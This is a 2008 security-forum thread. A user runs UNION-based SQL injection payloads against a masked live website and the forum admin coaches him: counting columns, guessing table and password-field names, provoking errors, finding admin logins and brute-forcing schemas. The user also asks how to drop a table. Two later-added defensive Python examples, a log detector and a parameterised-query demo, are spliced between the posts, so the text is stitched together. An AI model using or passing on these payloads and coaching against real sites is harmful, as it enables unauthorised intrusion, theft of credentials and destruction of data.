IT Security and Insecurity Portal
Posted: Mon May 26, 2008 12:37 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
Here is what I am getting when I run the queries:
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+mysql.user--+
Quote: | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM mysql.user-- . SELECT command denied to user '**REVEALS_A_USERNAME**'@'localhost' for table 'user'
|
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+USER(),2,3,4,5,6,7,8--+
Quote: | **REVEALS_A_USERNAME**@localhost
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes |
http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+DATABASE(),2,3,4,5,6,7,8--+
Quote: | **DIFFERENT_USERNAME**
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes |
The other queries all fail with output like this:
Quote: |
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM user-- . Table '**SECOND_USERNAME**.user' doesn't exist |
I know one table is called 'poll'. I have a suspicion that this is part of a phpbb db, but table names like phpbb_users, phpbb_posts etc don't give me any results.
You guys are good, very good. Is there a way I can just drop the table 'poll'?
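Seen from the server side, every probe pasted in the post above passes through the web server's access log, so the URL pattern is what a defender looks for. The following Python is an added example, not code from this thread or from the affected site: it runs four simple rules over constructed combined-log lines modelled on the URLs quoted above, after decoding both `%xx` escapes and `+` (the thread notes both spellings of a space work). The rule names, sample addresses and timestamps are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format) modelled on the URLs
# quoted in the thread. Addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2008:12:30:01 +0000] "GET /archive.php?id=17 HTTP/1.1" 200 2311
10.0.0.5 - - [26/May/2008:12:30:09 +0000] "GET /archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+mysql.user--+ HTTP/1.1" 200 512
10.0.0.5 - - [26/May/2008:12:30:15 +0000] "GET /archive.php?id=-1%20UNION%20ALL%20SELECT%20USER(),2,3,4,5,6,7,8--%20 HTTP/1.1" 200 2290
10.0.0.7 - - [26/May/2008:12:31:00 +0000] "GET /archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables/* HTTP/1.1" 200 498
10.0.0.9 - - [26/May/2008:12:32:44 +0000] "GET /memberlist.php?start=0 HTTP/1.1" 200 8812
"""

# Pulls the request target out of a combined-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each rule: (name, regex applied to the decoded, lower-cased query string).
# Names are hypothetical; tune the patterns to the application's real parameters.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("trailing_comment", re.compile(r"(?:--\s|/\*|#)\s*$")),
    ("system_catalog", re.compile(r"\b(?:information_schema|mysql\.user)\b")),
    ("db_function", re.compile(r"\b(?:user|database|version)\(\)")),
]


def normalise(url):
    """Return the decoded, lower-cased query string of a request target."""
    query = url.partition("?")[2]
    # unquote_plus turns '+' into a space and decodes %xx; a second pass
    # catches double-encoded payloads.
    return unquote_plus(unquote_plus(query)).lower()


def scan_line(line):
    """Return the names of the rules that fire on one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    q = normalise(m.group(1))
    return [name for name, rx in RULES if rx.search(q)]


def scan_log(text):
    """Return {line_number: [rule names]} for every line that triggered a rule."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        fired = scan_line(line)
        if fired:
            hits[n] = fired
    return hits


if __name__ == "__main__":
    for n, rules in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(rules)}")
```

Decoding before matching matters: `+`, `%20` and a literal space all reach the database as the same byte, so a rule that only looks at the raw URL is trivially bypassed by changing the encoding. A hit on `system_catalog` or `db_function` from one client address, as in lines 2 to 4, is the signal worth alerting on; the legitimate `id=17` and `start=0` requests fire nothing.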
Posted: Mon May 26, 2008 12:58 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
1. No, you can't drop that SQL table in an easy way.
2. You must analyze that website - is it running some forum, blog or CMS? Can you identify which one? Are there any user login possibilities? Try "victim.com/admin", "victim.com/admin.php" and other traditional admin interface places. You must guess the SQL table name before getting deeper! For example, in the case of phpBB and many other forums and CMSs there is a prefix which can be different from the default. This can be bruteforced (if it's short) or just guessed. And one way to reveal the database schema is to provoke more SQL errors. So play with various URLs and GET/POST parameters and try to get as many different SQL errors as possible.
And try other "usual" table names:
news, sessions, logins, data, pages, page, people, post, posts, conf, config, pic, pictures, etc. etc. This can get you a better "inside look" at the database internals.
One more thing: "SECOND_USERNAME" is actually the database name. Does it show what software engine is used?
Posted: Mon May 26, 2008 1:45 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
Quote: | second_username
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%) |
This is what it shows, and I would imagine that it is the database name.
So now I need to guess the tables to get any further?
Posted: Mon May 26, 2008 1:58 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
Yes. There are multiple scenarios:
1. That website does not contain a web-based admin interface at all, and the same goes for any user accounts. It means that the specific SQL injection is basically useless.
2. The website contains an admin interface. If you can guess the database table with the admin password hashes, then maybe you can log in as admin. The next step depends on the specific admin interface's features.
3. The website contains user accounts. In this case user data theft is possible, but I'm not sure that this will help you.
So your best shot is still a possible admin interface.
Posted: Mon May 26, 2008 2:11 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
Posted: Mon May 26, 2008 2:42 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
1. Try this:
Code: |
http://yourtarget.com/phpbb/memberlist.php?start=-1
|
If you are lucky, then nice sql error message pops up.
2. Search google:
Code: |
site:yourtarget.com "SQL Error"
|
Posted: Mon May 26, 2008 2:52 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
No go on either.
There are some remnants of an old ikonboard forum at the site, but it redirects to phpBB 2.0.22.
Other than guessing the tables, I'm stuffed!
Thank you all for your help anyway. Appreciate your time, Gentlemen.
Posted: Wed May 28, 2008 7:52 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
Gentlemen, I have a limited grasp of SQL. Can you break this down a little for me, so I can understand it properly?
Why are we saying minus 1 (-1)?
Quote: | What are the '+' signs for? |
Is it to encode the URL spaces?
+UNION+ALL+SELECT+ (I'm ok with that)
Quote: | COUNT(*),2,3,4,5,6,7,8 |
I don't get this?
Why the two dashes on the end of 'users'?
I know this must be tedious to answer, but it would help me no end. I've made a basic search but I can't make it out.
Thank you for your help, if you get the time.
Posted: Wed May 28, 2008 8:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
1. "id=-1" is an id which is probably invalid (usually ids are >=1), so the main SQL query will fetch 0 results and it's easier to fetch our own data (with UNION).
2. "+UNION+SELECT+" is the same as " UNION SELECT " or "%20UNION%20SELECT%20". It's just my personal habit, because "+" signs as URL-encoded spaces look somehow cleaner in the URL.
3. "COUNT(*),2,3,4,5,6,7,8" - what part don't you understand? It's a traditional UNION attack with 8 columns, and as I am trying to guess the table name and I don't know any field names either, COUNT(*) is very useful - it will work without field name(s). Now if we are lucky and the database has the right table, then we can see the count of rows; in the case of a users table it's the count of user entries. And now, when we have the table name, the next thing is field guessing:
"UNION+ALL+SELECT+COUNT(username),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(name),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(login),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pass),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pwd),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(lpassword),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(hash),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(md5),2,3,4,5,6,7,8+FROM+users"
... etc. etc. etc. ... till you have all the wanted field names.
4. "+FROM+users--+" is again my personal habit and style concerning ending comments. You know that SQL injection trick from tutorials:
"UNION ALL SELECT 1,2,3,4/*"
That's commenting out using C-style comments "/*".
But MySQL allows other comment types too, like two dashes and one space. And again the space can be URL-encoded as "+".
So it's a kind of good-looking commenting out: "--+"
It can be "/*", "--%20" or "-- ", they all work as expected.
So as you can see I am not just copycatting SQL injection tutorials, but instead develop new styles and tricks.
One example: collation errors. They are common problems in the way of SQL injection exploitation and the usual countermeasure is "CAST" or "CONVERT".
But in the case of MySQL version 5.x I suggest the UNHEX(HEX(field)) construction.
Posted: Thu May 29, 2008 9:09 am
tinman
Active user
Joined: May 11, 2008
Posts: 37
So the count(*) is a wildcard to return any field.
The 1,2,3,4,5,6,7,8 returns 8 columns ( so 1,2,3,4,5,6,7,8,9 would return 9 and 1,2,3,4 would return 4?) Why do we settle for 8? Is there a reason for this?
Understand +
Understand --+ (I was taught # in SQL but yours looks a whole lot better)
Thank you again.
Posted: Thu May 29, 2008 9:15 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
1. COUNT(*) is just "count all rows":
http://dev.mysql.com/doc/refman/5.0/en/counting-rows.html
2. The needed column number (in the case of the example it's eight) must be found beforehand:
"UNION ALL SELECT 1--+" --> error message about column count mismatch
"UNION ALL SELECT 1,2--+" --> error message
"UNION ALL SELECT 1,2,3--+" --> error message
...
"UNION ALL SELECT 1,2,3,4,5,6,7,8--+" --> no error message about column count mismatches
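The error messages quoted earlier in the thread show the root cause on the application side: the page echoes "SELECT ... from poll WHERE id = " followed by whatever arrived in id=, and then echoes the driver's error text as well. The following Python/sqlite3 snippet is an added example, not code from this thread or from the affected site. It rebuilds a poll table with the columns named in the echoed query (constructed rows), shows why the concatenated query accepts the UNION payload explained two posts above and why a column-count probe from this post surfaces a driver error when the application prints it, and places the parameterised, type-checked version beside it. SQLite's error wording differs from MySQL's, and the function names vulnerable_lookup and safe_lookup are mine.

```python
import sqlite3

# Constructed schema and rows mirroring the poll table named in the thread's
# error messages (question, response1..3, votes1..3, date). Not the site's data.
SCHEMA = """
CREATE TABLE poll (
    id INTEGER PRIMARY KEY,
    question TEXT, response1 TEXT, response2 TEXT, response3 TEXT,
    votes1 INTEGER, votes2 INTEGER, votes3 INTEGER, date TEXT
);
INSERT INTO poll VALUES (1, 'Best OS?', 'Linux', 'BSD', 'Windows', 5, 6, 7, '2007-11-30');
INSERT INTO poll VALUES (2, 'Best editor?', 'vi', 'emacs', 'nano', 3, 2, 1, '2007-12-01');
"""

COLUMNS = "question, response1, response2, response3, votes1, votes2, votes3, date"

# Decoded forms of the URL payloads quoted in the thread: '+' turned back into
# a space, so '--+' becomes the '-- ' comment marker.
UNION_PAYLOAD = "-1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM poll-- "
SHORT_PAYLOAD = "-1 UNION ALL SELECT 1-- "


def new_db():
    """Fresh in-memory database loaded with the constructed poll table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Concatenates ?id= straight into the statement, like the page in the thread.
    Returns (rows, error_text); error_text echoes the driver error the way the
    site did, which is what leaked table, user and database names."""
    sql = f"SELECT {COLUMNS} FROM poll WHERE id = {raw_id}"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], f"Could not execute query: {sql} . {exc}"


def safe_lookup(conn, raw_id):
    """Hardened version: checks the type, binds the value as a parameter so it is
    never parsed as SQL, and returns a fixed message instead of driver text."""
    try:
        poll_id = int(raw_id)
    except ValueError:
        return [], "invalid id"
    rows = conn.execute(f"SELECT {COLUMNS} FROM poll WHERE id = ?", (poll_id,)).fetchall()
    return rows, None


if __name__ == "__main__":
    conn = new_db()
    print(vulnerable_lookup(conn, UNION_PAYLOAD))   # row count smuggled out via UNION
    print(vulnerable_lookup(conn, SHORT_PAYLOAD))   # column-count mismatch error echoed
    print(safe_lookup(conn, UNION_PAYLOAD))         # rejected before reaching the database
    print(safe_lookup(conn, "1"))                   # the real poll row
```

Two controls do the work: the bound parameter keeps the id a value, so "id=-1 UNION ..." can never change the statement, and the fixed error message removes the oracle that told the thread which column count, table and database names were right. The "SELECT command denied ... for table 'user'" error quoted at the top of the thread is the third control already in place on that server: the application's database account had no access to mysql.user, which is exactly why that probe failed.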
Posted: Thu May 29, 2008 5:05 pm
tinman
Active user
Joined: May 11, 2008
Posts: 37
Ha Ha Ha!!! Fantastic!
Thank you for that! You keep knocking until you get in!
If only I could find a brute force script to keep knocking the door for this:
-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**BRUTE FORCE**--+
Perhaps I should learn how to write shell scripts? How I would work out how to keep looping on the response would be my first problem, I guess.
Posted: Thu May 29, 2008 10:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
My personal favorite is PHP, so I'd use PHP CLI as the programming platform. But anything else can be used.
One thing to mention - MySQL is evolving, and right now there are fewer 5.x and more 4.x versions in use. But I'm sure that after 1-2 years most MySQL servers will be 5.x+. So the information_schema system catalog ...
http://dev.mysql.com/doc/refman/5.0/en/information-schema.html
... will be widely available and there will be no need for guessing or bruteforce anymore.
I love progress...
Posted: Fri May 30, 2008 7:02 am
tinman
Active user
Joined: May 11, 2008
Posts: 37
waraxe wrote: | I love progress... |
ROFL!
Now here is a funny thing. We established that this was a MySQL 4.x server.
I execute this, just out of curiosity:
Quote: | http://www.xxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+information_schema.tables--+ |
and I get this:
Quote: | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM information_schema.tables-- . SELECT command denied to user 'xxxxx_xxxxx'@'localhost' for table 'tables' |
I guess this is because only the root user has access to it on 4.x?
Posted: Fri May 30, 2008 11:26 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
In 4.x there should not be "information_schema" at all.
Try this:
Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables--+
|
Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+test_schema.tables--+
|
Code: |
http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.test_tables--+
|
And describe the error messages.